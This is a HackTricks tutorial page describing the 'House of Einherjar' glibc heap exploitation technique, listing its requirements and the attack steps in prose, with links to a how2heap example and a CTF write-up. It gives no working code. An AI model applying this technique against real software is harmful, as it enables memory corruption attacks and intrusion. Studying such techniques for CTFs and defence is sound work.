hacktricks/binary-exploitation/heap/house-of-einherjar.md

House of Einherjar

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Basic Information

Code

• Check the example from https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c

Goal

• The goal is to allocate memory in almost any specific address.

Requirements

• Off by one over the header of the next chunk to modify the prev in use
• Be able to modify the prev_size data, which is part of the current chunk (at the end)
• Heap leak

Attack

• A fake chunk is created inside a chunk controlled by the attacker pointing with fd and bk to the original chunk to bypass protections
• 2 other chunks (B and C) are created
• Abusing the off by one in the B one the prev in use bit is cleaned and the prev_size data is overwritten with the difference between the place where the C chunk is allocated, to the fake A chunk generated before
  • This prev_size and the size of the fake chunk A must be the same to bypass checks.
• Then, the tcache is filled
• Then, C is freed so it consolidates with the fake chunk A
• Then, a new chunk D is created which will be starting in the fake A chunk and covering B chunk
• Then, B's fd is overwritten making it point to the target address abusing the D chunk (as it contains B inside) and B is freed to add the target to the fast bin
  • This is the common fast bin attack
• Then, 2 mallocs are done and the second one id going to be allocating the target address

References and other examples

• https://github.com/shellphish/how2heap/blob/master/glibc_2.35/house_of_einherjar.c
• https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house_of_einherjar/#2016-seccon-tinypad
  • After freeing pointers their aren't nullified, so it's still possible to access their data. Therefore a chunk is placed in the unsorted bin and leaked the pointers it contains (libc leak) and then a new heap is places on the unsorted bin and leaked a heap address from the pointer it gets.

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

• If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
• Get the official PEASS & HackTricks swag
• Discover The PEASS Family, our collection of exclusive NFTs
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.